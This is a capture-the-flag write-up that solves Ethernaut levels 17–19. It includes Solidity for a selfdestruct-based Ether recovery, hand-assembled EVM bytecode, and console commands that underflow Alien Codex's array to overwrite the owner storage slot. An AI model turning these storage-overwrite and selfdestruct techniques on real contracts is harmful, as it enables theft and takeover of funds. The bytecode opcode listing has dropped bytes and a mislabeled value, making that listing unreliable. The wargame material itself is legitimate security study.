Ethernaut challenges writeup Part IV (Challenges 17 to 19).

Continuing the saga for Ethernaut Solutions. My post for today explains how I solved challenges 17 to 19.

Enjoy!

Challenges write up

Recovery

Another lovely level, at least for me. I really liked the idea of somehow “store” Ether into the void and later be able to recover it. The idea for this challenge is that we need to be able to calculate the address of a contract (a SimpleToken instance) that was created by the Recovery contract. I found out very quickly the concept behind this challenge because previously I thought that I needed to do the same (calculate a contract address) in challenge #14 “Gatekeeper Two”.

Contract addresses are deterministically calculated, as explained in the solution using the following process:

keccack256(address, nonce) where the address is the address of the contract (or ethereum address that created the transaction) and nonce is the number of contracts the spawning contract has created (or the transaction nonce, for regular transactions).

Based on this I implemented the contract shown in the section below and tested if it correctly calculated some addresses. For this, I created a few tokens using generateToken function. Once I was sure that the function to calculate addresses was correct I assumed that the lost contract address was the first one created and the nonce == 1. With the address calculated I used method destroy which executes selfdestruct returning the stored Ether to an arbitrary account.

Solution code:

contract RecoveryTokens {

    constructor(address _forgottenToken, address  _recoveryAddr) public{
        address tokenAddr = _forgottenToken;
        SimpleToken(payable(tokenAddr)).destroy(payable(_recoveryAddr));
    }

}

contract SimpleToken {

  // public variables
  string public name;
  mapping (address => uint) public balances;

  // constructor
  constructor(string memory _name, address _creator, uint256 _initialSupply) public {
    name = _name;
    balances[_creator] = _initialSupply;
  }

  // collect ether in return for tokens
  receive() external payable {
    balances[msg.sender] = msg.value;
  }

  // allow transfers of tokens
  function transfer(address _to, uint _amount) public { 
    require(balances[msg.sender] >= _amount);
    balances[msg.sender] = balances[msg.sender] - (_amount);
    balances[_to] = _amount;
  }

  // clean up after ourselves
  function destroy(address payable _to) public {
    selfdestruct(_to);
  }
}

Magic number

There wasn’t a lot of things to do in this level more than learn the basics to write a contract in bytecode. Both links in the “Further Reading” section helped me a lot to understand a contract’s low level architecture and what I had to respect to make it work. I also was lucky to find a tool like “My Ether Wallet” which allowed me to deploy RAW bytecode very quickly to perform a lot of testing.

I used the following ABI extracted from Remix to be able to deploy my bytecode:

Solver's ABI:

[
	{
		"constant": false,
		"inputs": [],
		"name": "whatIsTheMeaningOfLife",
		"outputs": [
			{
				"internalType": "uint256",
				"name": "",
				"type": "uint256"
			}
		],
		"payable": false,
		"stateMutability": "nonpayable",
		"type": "function"
	}
]

And here is the bytecode for my solution. the first part is the boilerplate code that deploys the actual solver which is exactly 10 OPCODES long.

// Solver's bytecode:

0A   // PUSH 0x0A
0C   // PUSH 0x0C
00   // PUSH 0x00 
    // CODECOPY    
0A   // PUSH 0x0A
00   // PUSH 0x00
F3      // RETURN

2A   // PUSH 0x42
00   // PUSH 0x00
    // MSTORE
20   // PUSH 0x20
00   // PUSH 0x00
F3      // RETURN 

// 0x600A600C600039600A6000F3602A60005260206000F3

Calldata used to verify this level: 0xc882d7c2000000000000000000000000a4e31315212b45283b9c593a7b46b036a903786f

Useful tools

My Ether Wallet - https://www.myetherwallet.com/wallet/deploy - Allows to deploy bytecode directly without any issues.
Ethererum Virtual Machine IO - https://www.ethervm.io/
SolMap - https://solmap.zeppelin.solutions/

Alien Codex

The idea of this level is that we can underflow the size of the bytes32[] public codex array and with that have the possibility to write in arbitrary storage slots. Based on this primitive we can overwrite slot 0 which holds the address of the contract’s owner.

I won’t describe how dynamic arrays are stored in the EVM, for that you can refer to the first link in the Further Reading section which helped me a lot understanding how things worked under the hood.

To solve this level I followed these steps:

await contract.make_contact() // make contact to be able to execute the other functions

Trigger the underflow in the codex array:

await contract.retract()

Now if we check the storage variable which holds the array size we should see 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff.

await  web3.eth.getStorageAt(contract,1)
'0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff'

With this step done we can write anywhere in storage simply calculating the address of the slot we want to change. I learned how to do this here)

hex(2**256-keccak(0x01))

'0x4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a'

Once we have the result 0x4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a we can use method revise to write our address (plus the 0x01 from the bool variable) in the destination slot.

await contract.revise("0x4ef1d2ad89edf8c4d91132028e8195cdf30bb4b5053d4f8cd260341d4805f30a", "0x000000000000000000000001922e34D7d34C70Df760DF873BC6F99a10dea516E") // Overwrite storage's Slot 0 (Owner + contact bool variable)